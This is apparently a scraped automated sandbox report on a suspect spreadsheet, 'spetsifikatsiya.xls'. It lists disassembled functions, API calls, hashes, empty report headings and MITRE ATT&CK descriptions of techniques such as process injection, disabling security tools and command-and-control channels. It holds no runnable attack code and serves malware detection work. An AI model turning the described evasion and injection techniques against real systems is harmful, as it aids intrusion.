Instruction Fuzzy Hash: 37C04C6699E53129258836983847CEF428E8E66321351067FF915662826DC91D8302BE

Uniqueness

Uniqueness Score: -1.00%

Function 00409A24, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00409A2B

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

1.33, xrefs: 00409A25, 00409A2A, 00409A32
1.33, xrefs: 00409A33

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.33$1.33
API String ID: 4000879885-761529179
Opcode ID: 40fd6ca206f518ffb1a196a9706a210e5a361bec872da87837d2cc4d72b99d86
Instruction ID: df9d5d26a1ca0de4eecd05fd668f611b37ec6b1afeeacc29b07da1b8d6e972b3
Opcode Fuzzy Hash: 40fd6ca206f518ffb1a196a9706a210e5a361bec872da87837d2cc4d72b99d86
Instruction Fuzzy Hash: 95C04C2299D5306925C9326D3847CEF418E8DA6721352067FB51475282ADC91D8203FD

Uniqueness

Uniqueness Score: -1.00%

Function 0040BFF2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0040BFF9

Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87

Strings

1.33, xrefs: 0040C001
1.33, xrefs: 0040BFF3, 0040BFF8, 0040C000

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: __onexit_strlen
String ID: 1.33$1.33
API String ID: 4000879885-761529179
Opcode ID: d60cb0ac624d31031c93b3aa00832a3547e6cab49a508dd03223c9160e8be923
Instruction ID: 3f7ce5fab50691dbdf2f7673179437f17d2999cdd4e9253c585378448e302fe9
Opcode Fuzzy Hash: d60cb0ac624d31031c93b3aa00832a3547e6cab49a508dd03223c9160e8be923
Instruction Fuzzy Hash: ABC04C5299D53029258832683887CEF419E8D66761351067FF510A5281AD895D8202BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040F270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,CreateHardLinkW), ref: 0040F27A

Part of subcall function 005C6A10: GetProcAddress.KERNEL32(?,?,0040F286,00000000), ref: 005C6A18

Strings

kernel32.dll, xrefs: 0040F275
CreateHardLinkW, xrefs: 0040F270

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressHandleModuleProc
String ID: CreateHardLinkW$kernel32.dll
API String ID: 1646373207-294928789
Opcode ID: 699e2d7b0c3591995e5e6bf75acb16ebeb4ae7f70bda97d14c4cd711314aaae0
Instruction ID: 9c56cea4b4eb40840ee6c77f750cea53d91e62e982e378573b4a0763a5d126f9
Opcode Fuzzy Hash: 699e2d7b0c3591995e5e6bf75acb16ebeb4ae7f70bda97d14c4cd711314aaae0
Instruction Fuzzy Hash: 89B092B5D42341AA87002BA2AC1EA1D3E1AA56572A7818827F002A6656EE641251576A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F290, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,CreateSymbolicLinkW), ref: 0040F29A

Part of subcall function 005C6A10: GetProcAddress.KERNEL32(?,?,0040F286,00000000), ref: 005C6A18

Strings

kernel32.dll, xrefs: 0040F295
CreateSymbolicLinkW, xrefs: 0040F290

Memory Dump Source

Source File: 0000001B.00000002.2397201514.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressHandleModuleProc
String ID: CreateSymbolicLinkW$kernel32.dll
API String ID: 1646373207-1962376091
Opcode ID: 59b0ccb2ed71d6c7bf0c4f77b8bc1e6fd216f8acdafea6e3f1c75a6b7d643419
Instruction ID: 94dbf716fcc39379530ff690dc3fc02cb93e2bb9900781afd53ec2bd5da3e712
Opcode Fuzzy Hash: 59b0ccb2ed71d6c7bf0c4f77b8bc1e6fd216f8acdafea6e3f1c75a6b7d643419
Instruction Fuzzy Hash: 9FB09BE5D416419E860017A26C1ED1839155551717741C417F001B6655DD7401115B15

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report spetsifikatsiya.xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Cryptography:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "spetsifikatsiya.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156

General

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre